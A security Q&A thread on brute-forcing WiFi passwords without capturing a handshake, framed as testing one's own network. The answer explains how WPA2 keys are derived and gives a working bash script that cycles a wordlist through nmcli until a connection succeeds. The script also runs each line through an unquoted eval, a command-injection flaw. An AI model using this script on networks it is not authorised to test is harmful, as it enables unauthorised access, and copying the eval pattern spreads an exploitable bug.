# Cracking WiFi credentials without handshake or PKMS

Tags: authentication, wifi, password-cracking, credentials

How can I crack WiFi credentials WITHOUT using the traditional method of capturing a PKMS or Handshake?

When I connect to a WiFi network, I simply enter a password into a text box just like any other login form. Only with the difference that with any other login form I have the ability to test different credentials, say with Hydra or other tools.

I am well aware that maybe a handshake/PKMS is the most efficient way. I also know of tools that do this. For example Fsociety has a mobile application that does this (it just runs a list of 10,000 most common passwords against any WiFi within reach).

Is there a way to try this on my own WiFi network?

Answer (score 2):

> I simply enter a password into a text box just like any other login form

Well yes, but actually no.
WPA2-PSK authentication actually occurs during the 4-way handshake process. The Pre-Shared Key (PSK, the key you are referring to as password) is used to derive the Pairwise Master Key (PMK) during the 4-way handshake process. The PMK is then used to generate the Pairwise Transient Key (PTK) which is used to encrypt the communication between the client and the access point.

Or again, explained with this image.

[image]

[source](https://www.researchgate.net/figure/Generation-of-WPA-WPA2-Four-way-Handshake-33_fig3_342283555)

So in order to brute force your WiFi without an offline attack, you need to automatically perform 4 way handshakes with different PSKs until being authorized successfully.
Hydra can't be used for that since its only for network protocols and services, such as FTP, SSH, Telnet, SMTP, HTTP etc.

I wrote this bash script iterates through a file and that tries to authenticate to a WiFi network using every password in the file.

Keep in mind that it is illegal to perform a brute force attack on networks that you don't own or don't have permission to.

```
#!/bin/bash

# Set the path to the file
file_path="/path/to/file.txt"

# Loop through each line of the file
while IFS= read -r line; do
  # Insert the line into the command
  command_output=$(eval "sudo nmcli device wifi connect [SSID here] password $line")
  # Replace [SSID here] with name of your wifi

  # Print the command output
  echo "$command_output"

  # Check if the output contains "successfully"
  if [[ $command_output == *"successfully"* ]]; then
    echo $line
    # If it does, break the loop
    break
  fi
done < "$file_path"
```

Comment: Okay, so Mac OS has nmcli? Because I am reading that it was removed in Sierra. That is helpful though because that script can just be swapped out for networksetup? I am not positive it's removed either. Sometimes with Apple they like to make things difficult. Some tasks can only be done with the coreWLAN API. The android mobile app that I saw do this had to use Androids API. So I guess my question is, do you know if nmcli will work, networksetup, or coreWLAN API will for on a Mac w M chip?

Comment: Well idk, either modify the script for your needs or ditch MacOS and Install Linux